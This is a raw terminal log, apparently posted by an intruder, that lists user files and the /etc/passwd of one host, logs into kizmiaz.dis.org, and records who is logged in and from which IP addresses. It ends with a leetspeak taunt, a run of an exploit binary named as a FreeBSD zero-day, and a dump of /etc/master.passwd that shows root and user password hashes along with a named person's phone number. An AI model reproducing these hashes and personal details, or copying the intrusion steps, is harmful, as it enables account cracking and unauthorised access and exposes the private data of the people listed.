drwxr-xr-x 2 erik users 288 2005-06-06 03:19 newlocallogs
drwxr-xr-x 4 erik users 176 2005-06-10 16:18 newnewnewnew
drwxr-xr-x 4 erik users 120 2005-06-08 00:24 newservers
drwxr-xr-x 7 erik users 2760 2005-06-06 02:28 nmap-3.30
-rwxr-xr-x 1 erik users 1129443 2005-06-06 02:21 nmap-3.30.tgz
-rwxrwxrwx 1 erik users 19552 2006-01-05 00:17 nsb
-rw-r--r-- 1 erik users 573691 2005-09-17 12:42 NTFS.SYS
-rw-r--r-- 1 erik users 0 2005-09-02 04:08 O
drwxr-xr-x 2 erik users 96 2005-09-17 10:26 partimage
-rw-r--r-- 1 erik users 934 2005-01-31 20:35 .profile
drwxr-xr-x 2 erik users 80 2005-01-31 20:35 public_html
drwxr-xr-x 2 erik users 224 2005-07-06 13:12 rangefiles
drwxr-xr-x 2 erik users 136 2005-11-16 13:12 scripts
-rw-r--r-- 1 erik users 124 2005-07-11 08:09 serverinfo
drwx------ 2 erik users 80 2005-09-20 10:36 .ssh
-rw-r--r-- 1 erik users 7005938 2005-05-17 02:59 udplocal
-rw-r--r-- 1 erik users 246784 2005-06-07 22:43 udplog
-rw-r--r-- 1 erik users 246598 2005-05-19 00:28 uk.list
-rw-r--r-- 1 erik users 311 2005-01-31 20:35 .urlview
-rw------- 1 erik users 5042 2006-01-05 00:19 .viminfo
drwxr-xr-x 2 erik users 176 2005-06-06 02:59 .vnc
-rw------- 1 erik users 267 2005-09-22 13:06 .Xauthority
-rw-r--r-- 1 erik users 7913 2005-01-31 20:35 .xcoralrc
drwxr-xr-x 2 erik users 72 2005-01-31 20:35 .xemacs
-rw-r--r-- 1 erik users 4414 2005-01-31 20:35 .xim.template
-rwxr-xr-x 1 erik users 3055 2005-01-31 20:35 .xinitrc.template
-rw-r--r-- 1 erik users 231 2005-08-31 06:34 XOT_active.txt
-rw-r--r-- 1 erik users 119 2005-01-31 20:35 .xtalkrc
-rw-r--r-- 1 erik users 68361 2005-07-01 12:29 zanzau
[erik@dat0rgat0r] $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
games:x:12:100:Games account:/var/games:/bin/bash
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
mysql:x:60:2:MySQL database admin:/var/lib/mysql:/bin/false
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
ntp:x:74:65534:NTP daemon:/var/lib/ntp:/bin/false
vdr:x:100:33:Video Disk Recorder:/var/spool/video:/bin/false
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
mindshadow:x:1000:100:MindShadow:/home/mindshadow:/bin/bash
lynn:x:1001:100:Lynn M Wallenstein:/home/lynn:/bin/bash
liz:x:1002:100:Liz Wallenstein:/home/liz:/bin/bash
bill:x:1003:100:William Wallenstein:/home/bill:/bin/bash
onegin:x:1005:100:Will:/home/onegin:/bin/bash
codedbliss:x:1006:100:Bruce:/home/codedbliss:/bin/zsh
mjhorney:x:1009:100:Mikey:/home/mjhorney:/bin/bash
lora:x:1010:100:Lora Wallenstein:/home/lora:/bin/bash
mazhar:x:1011:100:Mazhar Pathan:/home/mazhar:/bin/bash
saif:x:1012:100:Saif Pathan:/home/saif:/bin/bash
heather:x:1013:100:Heather Harris:/home/heather:/bin/bash
chad:x:1014:100::/home/chad:/bin/bash
bruce:x:1015:100::/home/bruce:/bin/zsh
erik:x:1016:100:erik:/home/erik:/bin/bash
joe:x:1018:100::/home/joe:/bin/bash
lwallenstein:x:1019:100:Lynn Wallenstein:/home/lwallenstein:/bin/bash
pawallenstein:x:1020:100:Patricia Wallenstein:/home/pawallenstein:/bin/bash
hobremski:x:1021:100:Heather O'Bremski:/home/hobremski:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
[erik@dat0rgat0r] $ ssh enrique@kizmiaz.dis.org
enrique@kizmiaz.dis.org's password:
[enrique@kizmiaz] $ w
6:05AM up 39 days, 10:46, 5 users, load averages: 0.02, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
dover p0 216.240.45.19 Wed01AM 15:37 -csh (csh)
gessel p1 c-24-62-5-193.hs 1:10AM 4:55 -csh (csh)
shipley p2 216.240.45.19 Tue11AM 16:27 -csh (csh)
shipley p3 216.240.45.19 Thu06PM 12:02 -csh (csh)
enrique p4 ip70-180-216-196 2:33AM 43 bash
[enrique@kizmiaz] $ ls -al
total 34530
drwxr-xr-x 11 enrique enrique 2048 Dec 23 05:21 .
drwxr-xr-x 149 root wheel 3072 Dec 10 07:32 ..
drwx------ 3 enrique enrique 512 Dec 15 2003 .BitchX
-rw------- 1 enrique enrique 122 Sep 19 17:21 .Xauthority
-rw-r--r-- 1 enrique enrique 141 Feb 3 2005 .addressbook
-rw------- 1 enrique enrique 2513 Feb 3 2005 .addressbook.lu
-rw-r--r-- 1 enrique enrique 28 Sep 27 2001 .bitchxrc
drwx------ 2 enrique enrique 1024 Mar 13 2005 .bsflog
-rw-r--r-- 1 enrique enrique 494 Sep 27 2001 .cpsave
-rw-r--r-- 1 enrique enrique 628 Mar 5 2001 .cshrc
-rw-r--r-- 1 enrique enrique 179 Sep 27 2001 .cyp.col
-rw-r--r-- 1 enrique enrique 287 Sep 27 2001 .cyp.fsave
lrwxr-xr-x 1 enrique enrique 9 Mar 15 2005 .history -> /dev/null
-rw-r--r-- 1 enrique enrique 299 Mar 5 2001 .login
-rw-r--r-- 1 enrique enrique 160 Sep 27 2001 .login_conf
-rw------- 1 enrique enrique 371 Mar 5 2001 .mail_aliases
-rw-r--r-- 1 enrique enrique 331 Mar 5 2001 .mailrc
-rw-r--r-- 1 enrique enrique 11 Jan 11 2005 .mh_profile
-rw------- 1 enrique enrique 1683 Dec 9 16:52 .pine-interrupted-mail
-rw-r--r-- 1 enrique enrique 17478 Dec 1 09:15 .pinerc
-rw-r--r-- 1 enrique enrique 722 Mar 5 2001 .profile
-rw------- 1 enrique enrique 276 Mar 5 2001 .rhosts
-rw-r--r-- 1 enrique enrique 852 Mar 5 2001 .shrc
drwxr-xr-x 2 enrique enrique 512 Dec 22 14:44 .ssh
-rw-r--r-- 1 enrique enrique 7287 Jul 26 2003 1A3.jpg
-rw-r--r-- 1 enrique enrique 8293 Oct 3 2001 990.b0red.bx
-rw-r--r-- 1 enrique enrique 120054 Sep 26 2001 BECKYC~1.JPG
-rw-r--r-- 1 enrique enrique 242343 Sep 26 2001 BECKYC~2.JPG
-rw-r--r-- 1 enrique enrique 6737 Dec 23 05:20 Geoffraie.zip
-rw-r--r-- 1 enrique enrique 57 Nov 12 23:51 HOLYBATHOOTERS
-rw-r--r-- 1 enrique enrique 18307 Aug 11 19:33 Increase_in_the_tax.rar
-rw-r--r-- 1 enrique enrique 19968 Apr 17 2005 Links.doc
drwx------ 2 enrique enrique 512 Jan 11 2005 Mail
-rw-r--r-- 1 enrique enrique 449 Apr 21 2005 Makefile
-rw-r--r-- 1 enrique enrique 26624 Feb 14 2005 RecordingServices.doc
-rw-r--r-- 1 enrique enrique 26112 Apr 17 2005 Salon Blow Again.doc
-rw-r--r-- 1 enrique enrique 31232 Apr 17 2005 Services.doc
-rw-r--r-- 1 enrique enrique 1376 Apr 18 2005 ass.irc
-rw-r--r-- 1 enrique enrique 13858 Feb 7 2005 asskey.txt
-rw-r--r-- 1 enrique enrique 1339 Feb 8 2005 awin.bx
-rw-r--r-- 1 enrique enrique 1029538 Feb 7 2005 bigmatix.txt
drwxr-xr-x 4 enrique enrique 512 Jan 30 2005 bsflite-0.72
-rw-r--r-- 1 enrique enrique 34446 Jan 30 2005 bsflite-0.72.tar.gz
-rw-r--r-- 1 enrique enrique 23 May 29 2005 cab
-rw-r--r-- 1 enrique enrique 322619 Mar 5 2005 calendar_glance.jpg
-rw-r--r-- 1 enrique enrique 83156 May 16 2005 classB.list
-rw-r--r-- 1 enrique enrique 601960 May 21 2005 country.tar.bz2
drwxr-xr-x 10 enrique enrique 512 Oct 21 2001 cyp
-rw------- 1 enrique enrique 601 Oct 10 15:04 dead.letter
-rw------- 1 enrique enrique 20464259 Dec 10 03:51 enrique.sav.gz
-rw-r--r-- 1 enrique enrique 739840 Jun 27 2003 forhazel.zip
-rw-r--r-- 1 enrique enrique 203186 May 18 2005 gb.list
-rw-r--r-- 1 enrique enrique 2591 Sep 26 2001 google.pl
-rw-r--r-- 1 enrique enrique 1071659 Dec 18 2003 images.zip
-rw-r--r-- 1 enrique enrique 1252 Jul 14 22:24 index.html?hop=fixmyreg
-rw-r--r-- 1 enrique enrique 1252 Sep 2 20:04 index.html?hop=fixmyreg.1
-rw-r--r-- 1 enrique enrique 106770 May 18 2005 iplist
-rw-r--r-- 1 enrique enrique 7476605 May 17 2005 ipplsorted.bz2
-rw-r--r-- 1 enrique enrique 4 May 4 2005 ips
-rw-r--r-- 1 enrique enrique 531 May 3 2005 ips.php
-rw-r--r-- 1 enrique enrique 37692 Apr 6 2002 lice.irc
-rw-r--r-- 1 enrique enrique 164031 Apr 6 2002 lice.tar.gz
drwxr-xr-x 2 enrique enrique 512 May 15 2005 log
drwx------ 2 enrique enrique 512 Dec 13 17:50 mail
drwx------ 2 enrique enrique 512 Dec 22 15:59 metamail_tmp
-rw-r--r-- 1 enrique enrique 930 Apr 18 2005 mexico.irc
-rw-r--r-- 1 enrique enrique 2119482 May 15 2005 newlist.bz2
lrwxr-xr-x 1 root enrique 30 Mar 5 2001 public_html -> /html/docs/www.dis.org/enrique
-rw-r--r-- 1 enrique enrique 33792 Apr 28 2003 resume.doc
-rw-r--r-- 1 enrique enrique 31 Sep 15 07:34 sheena.txt
-rw-r--r-- 1 enrique enrique 1599 Dec 14 13:58 sheenasucks
-rw-r--r-- 1 enrique enrique 2812 Dec 14 14:38 stuff
-rw------- 1 enrique enrique 1847 Mar 29 2005 stuff.save
-rw-r--r-- 1 enrique enrique 866 Apr 15 2005 swazi.irc
-rw-r--r-- 1 enrique enrique 81031 May 7 2000 warez.txt.gz
-rw-r--r-- 1 enrique enrique 1706 Jun 10 2005 wget-log
[enrique@kizmiaz] $ cd .BitchX
[enrique@kizmiaz] $ ls -al
total 134
drwx------ 3 enrique enrique 512 Dec 15 2003 .
drwxr-xr-x 11 enrique enrique 2048 Dec 23 05:21 ..
-rw-r--r-- 1 enrique enrique 98777 Sep 27 2001 BitchX.away
-rw-r--r-- 1 enrique enrique 13905 Sep 27 2001 BitchX.formats
-rw-r--r-- 1 enrique enrique 3564 Sep 27 2001 BitchX.sav
drwx------ 2 enrique enrique 512 Mar 5 2001 screens
[enrique@kizmiaz] $ w
2:34PM up 38 days, 19:14, 7 users, load averages: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
dover p0 216.240.45.19 Wed01AM 5 -csh (csh)
bifrost p1 server01.minions Wed11AM 2:49 pine -i
shipley p2 216.240.45.19 Tue11AM 56 -csh (csh)
gessel p3 c-24-62-5-193.hs 5:42AM 8:51 -csh (csh)
aloke p4 adsl-71-131-204- 12:16PM 1:24 -csh (csh)
enrique p6 oes21.com 1:20PM 1:12 more
gessel p7 MACLAURIN-FOURTE 2:11PM 22 -csh (csh)
[enrique@kizmiaz] $ last
gessel ttyp7 18.80.6.148 Thu Dec 22 14:11 still logged in
enrique ttyp7 67.138.244.8 Thu Dec 22 14:05 - 14:08 (00:03)
enrique ttyp6 67.138.244.8 Thu Dec 22 13:20 still logged in
aloke ttyp4 71.131.204.173 Thu Dec 22 12:16 still logged in
ftp ftp 172.182.129.160 Thu Dec 22 06:57 - 06:57 (00:00)
gessel ttyp3 24.62.5.193 Thu Dec 22 05:42 still logged in
gessel ttyp4 24.62.5.193 Wed Dec 21 21:21 - 21:49 (00:27)
aloke ttyp4 71.131.204.173 Wed Dec 21 16:26 - 17:33 (01:07)
gessel ttyp3 24.62.5.193 Wed Dec 21 12:32 - 22:42 (10:09)
bifrost ttyp1 209.237.225.2 Wed Dec 21 11:57 still logged in
enrique ttyp1 70.180.216.196 Wed Dec 21 07:02 - 08:20 (01:17)
dover ttyp0 216.240.45.19 Wed Dec 21 01:14 still logged in
gessel ttyp1 24.62.5.193 Tue Dec 20 22:36 - 01:26 (02:49)
gessel ttyp3 24.62.5.193 Tue Dec 20 21:17 - 23:27 (02:10)
bifrost ttyp1 209.237.225.2 Tue Dec 20 19:28 - 21:41 (02:13)
gessel ttyp3 66.174.93.103 Tue Dec 20 14:37 - 15:38 (01:00)
shipley ttyp2 216.240.45.19 Tue Dec 20 11:57 still logged in
aloke ttyp0 71.132.19.198 Tue Dec 20 11:08 - 23:18 (12:10)
bitrush ttyp0 66.129.224.36 Tue Dec 20 09:23 - 09:24 (00:01)
gessel ttyp3 66.93.181.147 Mon Dec 19 22:36 - 07:26 (08:49)
gessel ttyp4 66.93.181.147 Mon Dec 19 17:44 - 22:02 (04:18)
bifrost ttyp1 209.237.225.2 Mon Dec 19 16:45 - 19:19 (1+02:34)
bifrost ttyp1 209.237.225.2 Mon Dec 19 16:44 - 16:44 (00:00)
enrique ttyp4 70.180.216.196 Mon Dec 19 14:39 - 17:44 (03:04)
aloke ttyp3 71.132.19.198 Mon Dec 19 10:53 - 20:54 (10:00)
bifrost ttyp1 209.237.225.2 Mon Dec 19 10:48 - 16:05 (05:17)
db_cooper ttyp1 24.23.217.85 Mon Dec 19 09:41 - 09:42 (00:01)
dover ttyp0 216.240.45.19 Mon Dec 19 06:06 - 06:43 (1+00:37)
shipley ttyp2 216.240.45.19 Mon Dec 19 03:18 - 06:43 (1+03:25)
gessel ttyp0 69.69.90.2 Mon Dec 19 01:36 - 03:46 (02:10)
ftp ftp 220.226.171.250 Mon Dec 19 00:48 - 00:50 (00:02)
ftp ftp 66.249.66.232 Mon Dec 19 00:43 - 00:45 (00:02)
ftp ftp 66.249.66.232 Mon Dec 19 00:41 - 00:43 (00:02)
enrique ttyp2 66.235.215.176 Sun Dec 18 16:11 - 20:12 (04:01)
enrique ttyp2 70.180.216.196 Sun Dec 18 10:47 - 10:48 (00:00)
enrique ttyp2 70.180.216.196 Sun Dec 18 06:05 - 09:48 (03:43)
ftp ftp 66.249.66.232 Sun Dec 18 04:35 - 04:39 (00:04)
ftp ftp 66.249.66.232 Sun Dec 18 04:33 - 04:35 (00:02)
ftp ftp 66.249.66.232 Sun Dec 18 04:32 - 04:32 (00:00)
ftp ftp www.vcgg.com Sat Dec 17 20:23 - 20:23 (00:00)
enrique ttyp2 66.235.215.176 Sat Dec 17 17:18 - 06:05 (12:46)
ftp ftp 66.249.66.232 Sat Dec 17 14:51 - 14:53 (00:02)
ftp ftp 66.249.66.232 Sat Dec 17 13:06 - 13:08 (00:02)
enrique ttyp2 67.138.244.8 Sat Dec 17 06:55 - 08:20 (01:24)
bifrost ttyp1 209.237.225.2 Sat Dec 17 01:33 - 05:43 (2+04:10)
ftp ftp dau-new.chg.ru Sat Dec 17 00:50 - 00:50 (00:00)
bifrost ttyp6 209.237.230.227 Fri Dec 16 18:01 - 18:01 (00:00)
gessel ttyp4 69.69.90.2 Fri Dec 16 17:02 - 19:12 (02:10)
ftp ftp www.vcgg.com Fri Dec 16 14:43 - 14:43 (00:00)
ftp ftp www.vcgg.com Fri Dec 16 14:42 - 14:43 (00:00)
gessel ttyp4 69.69.90.2 Fri Dec 16 14:35 - 14:43 (00:08)
ftp ftp 84
.146.180.185 Fri Dec 16 13:50 - 13:51 (00:00)
aloke ttyp2 71.132.19.198 Fri Dec 16 10:37 - 18:47 (08:09)
cassiel ttyp6 68.127.162.214 Thu Dec 15 23:09 - 23:11 (00:02)
cassiel ttyp4 68.127.162.214 Thu Dec 15 22:56 - 01:17 (02:20)
gessel ttyp2 66.174.92.162 Thu Dec 15 21:13 - 23:51 (02:37)
dover ttyp3 216.240.45.19 Thu Dec 15 17:28 - 23:51 (3+06:22)
db_cooper ttyp6 24.23.217.85 Thu Dec 15 15:07 - 15:10 (00:02)
enrique ttyp4 70.180.216.196 Thu Dec 15 15:04 - 19:33 (04:29)
gessel ttyp3 208.54.95.129 Thu Dec 15 13:42 - 15:58 (02:16)
aloke ttyp2 71.131.208.119 Thu Dec 15 10:04 - 18:03 (07:58)
gessel ttyp2 66.174.93.98 Thu Dec 15 07:24 - 09:33 (02:08)
gessel ttyp3 208.54.95.129 Thu Dec 15 04:57 - 07:07 (02:10)
gessel ttyp2 208.54.95.129 Thu Dec 15 04:14 - 06:33 (02:19)
ftp ftp 62.57.9.78 Thu Dec 15 00:37 - 00:39 (00:02)
enrique ttyp3 70.180.216.196 Wed Dec 14 23:01 - 02:11 (03:09)
ftp ftp 67.181.74.207 Wed Dec 14 22:50 - 22:52 (00:02)
gessel ttyp2 66.174.92.162 Wed Dec 14 22:24 - 23:44 (01:19)
aloke ttyp2 71.131.235.247 Wed Dec 14 16:34 - 16:53 (00:18)
shipley ttyp0 216.240.45.19 Wed Dec 14 16:01 - 23:51 (4+07:49)
dover ttyp0 216.240.45.19 Wed Dec 14 16:01 - 16:01 (00:00)
bagg ftp 69.107.6.173 Wed Dec 14 14:27 - 14:46 (00:19)
enrique ttyp6 70.180.216.196 Wed Dec 14 13:58 - 15:07 (1+01:09)
ftp ftp 216.240.44.11 Wed Dec 14 13:48 - 13:49 (00:01)
ftp ftp 216.240.44.11 Wed Dec 14 13:43 - 13:43 (00:00)
gessel ttyp4 66.93.181.147 Wed Dec 14 12:07 - 20:23 (08:16)
bifrost ttyp1 209.237.225.2 Wed Dec 14 11:15 - 23:14 (2+11:58)
aloke ttyp0 71.131.226.167 Wed Dec 14 10:32 - 15:42 (05:09)
enrique ttyp0 70.180.216.196 Wed Dec 14 07:23 - 07:39 (00:15)
gessel ttyp4 66.93.181.147 Tue Dec 13 22:27 - 04:53 (06:25)
enrique ttyp1 70.180.216.196 Tue Dec 13 22:04 - 11:15 (13:11)
enrique ttyp4 70.180.216.196 Tue Dec 13 17:46 - 18:48 (01:01)
aloke ttyp1 71.131.226.167 Tue Dec 13 09:30 - 18:15 (08:45)
gessel ttyp1 71.198.45.135 Tue Dec 13 01:40 - 03:51 (02:10)
gessel ttyp4 66.174.93.99 Mon Dec 12 15:26 - 17:24 (01:58)
gessel ttyp4 24.62.5.193 Mon Dec 12 04:22 - 09:16 (04:54)
enrique ttyp1 loraayn.com Mon Dec 12 02:12 - 21:12 (18:59)
gessel ttyp4 66.174.92.164 Sun Dec 11 21:44 - 23:55 (02:10)
gessel ttyp1 70.209.130.27 Sun Dec 11 19:51 - 23:22 (03:30)
gessel ttyp1 71.49.210.30 Sun Dec 11 17:10 - 19:20 (02:10)
enrique ttyp1 67.138.244.8 Sun Dec 11 15:40 - 15:47 (00:07)
enrique ttyp6 70.180.216.196 Sun Dec 11 13:24 - 13:25 (00:00)
enrique ttyp6 oes21.com Sun Dec 11 12:46 - 12:53 (00:07)
aloke ttyp4 71.131.226.167 Sun Dec 11 12:43 - 16:32 (03:49)
enrique ttyp4 pathanfamily.org Sun Dec 11 09:54 - 12:43 (02:48)
gessel ttyp1 71.49.210.30 Sun Dec 11 09:50 - 14:37 (04:47)
db_cooper ttyp1 24.23.217.85 Sun Dec 11 06:25 - 06:27 (00:02)
gessel ttyp4 66.174.92.162 Sat Dec 10 21:53 - 00:16 (02:23)
gessel ttyp5 71.49.210.30 Sat Dec 10 17:04 - 20:14 (03:09)
gessel ttyp4 71.49.210.30 Sat Dec 10 16:51 - 19:01 (02:10)
dover ttyp3 216.240.45.19 Sat Dec 10 11:45 - 15:52 (4+04:06)
shipley ttyp3 69.42.8.15 Sat Dec 10 04:39 - 05:27 (00:48)
shipley ttyp3 69.42.8.15 Sat Dec 10 03:51 - 04:06 (00:14)
enrique ttyp1 70.180.216.196 Sat Dec 10 03:50 - 22:46 (18:55)
enrique ttyp1 67.138.244.8 Sat Dec 10 03:17 - 03:34 (00:17)
gessel ttyp3 71.49.210.30 Fri Dec 9 22:55 - 01:05 (02:10)
shipley ttyp1 69.42.8.15 Fri Dec 9 22:23 - 02:17 (03:54)
gessel ttyp1 66.174.92.163 Fri Dec 9 20:06 - 22:16 (02:10)
shipley ttyp3 69.42.8.15 Fri Dec 9 19:01 - 21:11 (02:10)
shipley ttyp3 69.42.8.15 Fri Dec 9 17:49 - 18:26 (00:36)
shipley ttyp1 69.42.8.15 Fri Dec 9 17:40 - 19:58 (02:18)
enrique ttyp1 70.180.216.196 Fri Dec 9 16:51 - 16:54 (00:02)
enrique ttyp1 70.180.216.196 Fri Dec 9 14:30 - 14:40 (00:09)
gessel ttyp4 71.49.210.30 Fri Dec 9 12:24 - 17:10 (04:45)
aloke ttyp3 71.131.226.167 Fri Dec 9 11:19 - 16:42 (05:23)
aloke ttyp1 71.131.179.62 Fri Dec 9 10:33 - 12:44 (02:10)
gessel ttyp1 66.174.93.101 Thu Dec 8 19:04 - 22:00 (02:55)
aloke ttyp1 71.131.179.62 Thu Dec 8 16:52 - 18:10 (01:18)
shipley ttyp2 216.240.45.19 Thu Dec 8 15:38 - 15:41 (6+00:03)
bifrost ttyp0 209.237.225.2 Thu Dec 8 15:31 - 04:12 (5+12:40)
carla ttyp0 209.133.53.217 Thu Dec 8 14:58 - 14:58 (00:00)
aloke ttyp6 71.131.179.62 Thu Dec 8 10:44 - 14:26 (03:42)
db_cooper ttyp4 24.21.198.181 Thu Dec 8 10:17 - 16:27 (06:09)
gessel ttyp2 71.198.45.135 Thu Dec 8 10:13 - 12:24 (02:10)
aloke ttyp0 71.131.218.189 Thu Dec 8 09:40 - 12:13 (02:33)
db_cooper ttyp2 24.21.198.181 Thu Dec 8 01:33 - 01:34 (00:00)
gessel ttyp0 71.198.45.135 Thu Dec 8 00:55 - 03:55 (02:59)
gessel ttyp0 66.93.181.147 Wed Dec 7 17:28 - 21:23 (03:55)
enrique ttyp2 67.138.244.8 Wed Dec 7 16:42 - 16:44 (00:02)
carla ttyp2 216.132.69.40 Wed Dec 7 15:30 - 15:35 (00:05)
seric ttyp2 seric.com Wed Dec 7 15:11 - 15:12 (00:01)
bitrush ttyp2 66.129.224.36 Wed Dec 7 13:45 - 13:47 (00:01)
enrique ttyp2 70.180.216.196 Wed Dec 7 12:40 - 13:13 (00:32)
aloke ttyp0 71.131.218.189 Wed Dec 7 09:42 - 17:17 (07:35)
db_cooper ttyp2 24.21.198.181 Tue Dec 6 23:58 - 00:01 (00:02)
enrique ttyp0 70.180.216.196 Tue Dec 6 23:58 - 00:01 (00:03)
enrique ttyp4 70.180.216.196 Tue Dec 6 17:23 - 17:41 (00:18)
almus ttyp6 67.180.208.137 Tue Dec 6 16:29 - 16:35 (00:06)
carla ttyp7 209.133.53.217 Tue Dec 6 15:48 - 15:48 (00:00)
bstring ttyp6 4.246.138.254 Tue Dec 6 15:40 - 15:50 (00:09)
dover ttyp5 216.240.45.19 Tue Dec 6 13:02 - 16:11 (2+03:08)
enrique ttyp4 70.180.216.196 Tue Dec 6 12:13 - 17:23 (05:10)
aloke ttyp2 71.131.218.189 Tue Dec 6 09:38 - 18:11 (08:33)
enrique ttyp2 66.235.215.176 Tue Dec 6 06:14 - 06:14 (00:00)
enrique ttyp2 66.235.215.176 Tue Dec 6 06:11 - 06:12 (00:00)
enrique ttyp4 70.180.216.196 Tue Dec 6 05:29 - 05:29 (00:00)
enrique ttyp2 67.138.244.8 Tue Dec 6 05:26 - 05:43 (00:17)
db_cooper ttyp4 24.21.198.181 Tue Dec 6 03:46 - 03:54 (00:08)
shipley ttyp2 69.42.8.15 Tue Dec 6 01:36 - 04:21 (02:44)
shipley ttyp4 69.42.8.15 Mon Dec 5 21:24 - 00:54 (03:29)
shipley ttyp2 69.42.8.15 Mon Dec 5 21:09 - 21:58 (00:49)
carla ttyp2 209.133.53.217 Mon Dec 5 17:16 - 17:17 (00:01)
carla ttyp4 209.133.53.217 Mon Dec 5 15:22 - 15:26 (00:04)
bifrost ttyp3 209.237.225.2 Mon Dec 5 12:37 - 15:13 (3+02:36)
aloke ttyp2 71.131.218.189 Mon Dec 5 10:03 - 17:01 (06:58)
shipley ttyp1 216.240.45.19 Mon Dec 5 09:23 - 16:20 (3+06:57)
gessel ttyp0 66.93.181.156 Mon Dec 5 06:16 - 20:44 (1+14:27)
shipley ttyp1 216.240.45.19 Sun Dec 4 18:53 - 23:44 (04:51)
aloke ttyp0 71.131.218.189 Sun Dec 4 17:46 - 20:37 (02:50)
bifrost ttyp1 209.237.225.2 Sun Dec 4 12:41 - 16:56 (04:14)
aloke ttyp0 71.131.218.189 Sun Dec 4 11:22 - 17:32 (06:10)
gessel ttyp1 66.174.93.100 Sat Dec 3 21:49 - 01:12 (03:22)
enrique ttyp0 70.180.216.196 Sat Dec 3 21:42 - 02:43 (05:00)
shipley ttyp0 216.240.45.19 Sat Dec 3 15:08 - 19:29 (04:21)
enrique ttyp1 70.180.216.196 Sat Dec 3 13:24 - 13:25 (00:00)
gessel ttyp1 71.49.214.235 Sat Dec 3 01:57 - 04:07 (02:10)
gessel ttyp1 66.174.92.162 Fri Dec 2 22:33 - 22:36 (00:03)
dover ttyp0 216.240.45.19 Fri Dec 2 20:36 - 13:35 (16:59)
aloke ttyp1 71.131.218.189 Fri Dec 2 19:04 - 19:25 (00:21)
gessel ttyp3 66.174.79.232 Fri Dec 2 15:10 - 17:22 (02:12)
shipley ttyp2 216.240.45.19 Fri Dec 2 12:51 - 14:35 (1+01:43)
carla ttyp1 www.transbay.net Fri Dec 2 11:55 - 18:16 (06:20)
db_cooper ttyp1 24.21.198.181 Fri Dec 2 09:49 - 10:35 (00:46)
aloke ttyp0 71.131.218.189 Fri Dec 2 09:41 - 19:15 (09:33)
enrique ttyp2 70.180.216.196 Thu Dec 1 22:52 - 22:52 (00:00)
carla ttyp5 209.133.53.217 Thu Dec 1 14:16 - 19:30 (05:14)
carla ttyp5 209.133.53.217 Thu Dec 1 13:45 - 13:47 (00:01)
db_cooper ttyp3 24.21.198.181 Thu Dec 1 13:26 - 12:19 (22:52)
aloke ttyp2 71.131.218.189 Thu Dec 1 10:05 - 19:17 (09:12)
enrique ttyp2 70.180.216.196 Thu Dec 1 09:15 - 09:18 (00:02)
wtmp begins Thu Dec 1 09:15:35 PST 2005
[enrique@kizmiaz] $ uname -a
FreeBSD kizmiaz.dis.org 5.0-DP1 FreeBSD 5.0-DP1 #8: Sat Nov 6 11:46:40 PST 2004 shipley@kizmiaz.dis.org:/usr/src/sys/i386/compile/KIZMIAZ i386
th3 r3zt 1z h1zt0ry.. w3'll k33p sn1ff1ng unt1l sh1pl3y r31nst4llz. h0no
r3sp3ctz g0th1c h1ppy w1r3dr1v13rz 0f 4ll cr33dz. k33p h4q1ng!
[enrique@kizmiaz] $ /tmp/fbsd-0ldd4y\(fl0kk3n\!\!\!\) -p 12:34:23 -f/tmp/targetz
[!] working ................
[!] worked
# cat /etc/master.passwd
#
# master.passwd,v 1.25 1999/09/13 17:09:07 peter Exp $
#
#root:$1$guZyyUiO$FF3XGdq9cL3NLQfZ9MVGF/:0:0::0:0:Charlie &:/root:/bin/csh
root:$1$DjE0i2EK$o7NA7p.2bPnv2/sRpt50y1:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
sshd:*:22:22::0:0:Ssh User:/var/empty:/sbin/nologin
mailnull:*:26:26::0:0:Sendmail default User:/var/spool/mqueue:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/var/named/var/named:/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67::0:0:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/sbin/nologin
mp3:*:70:70::0:0:MP3 access :/nonexistent:/sbin/nologin
www:*:80:80::0:0:WWW-server:/html/docs:/sbin/nologin
wwws:*:81:81::0:0:Secure WWW-server:/html/docs:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
shipley:$1$R2KJheGJ$2bguyDLKRrLyHKbpLY8UZ.:141:100:staff:0:0:Peter Shipley,Home,,510 849 2230:/home/shipley:/bin/csh
pcguest:*:102:102::0:0:pc guest access:/noexist:/sbin/nologin
brand:*anFuvWN.8ElXk:117:100::0:0::/home/brand:/bin/csh
nathan:$1$1rIkgT0g$oGVRGnGOCsknZ6J.u.nsQ/:118:100::0:0:Nathan Trueblood,,,:/home/nathan:/bin/csh
carla:2gepGyeNUYU82:126:100::0:0:Carla ?,,,:/home/carla:/bin/csh
